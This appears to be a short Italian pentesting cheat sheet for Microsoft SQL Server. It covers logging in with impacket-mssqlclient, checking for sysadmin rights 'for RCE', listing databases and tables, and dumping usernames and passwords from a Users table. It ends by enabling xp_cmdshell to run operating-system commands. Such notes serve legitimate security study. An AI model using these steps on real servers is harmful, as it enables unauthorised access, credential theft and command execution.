impacket-mssqlclient <nome utente>@<indirizzo IP> -windows-auth
#Poi inserisci la password
Comandi
Versione del DB:
SELECT @@version;Utente corrente:
SELECT user_name();Verifica se sei Sysadmin (importante per RCE):
SELECT IS_SRVROLEMEMBER('sysadmin');Se restituisce 1, hai il controllo totale.
Listare i Database (L’equivalente di vedere le “cartelle”)
SELECT name FROM master..sysdatabases;
# Oppure
select name from sys.databases
Spostarsi in un Database
USE nome_database;Listare le Tabelle (L’equivalente di ls)
SELECT table_name FROM information_schema.tables;Listare le Colonne di una Tabella
SELECT column_name FROM information_schema.columns WHERE table_name = 'Users';Leggere i Dati (L’equivalente di cat)
SELECT * FROM Users;
# Oppure, se vuoi solo colonne specifiche:
SELECT username, password FROM Users;
Abilitare xp_cmdshell
#Abilita le opzioni avanzate
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
#Abilita xp_cmdshell
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
Questa operazione la possiamo fare solo se siamo sysadmin.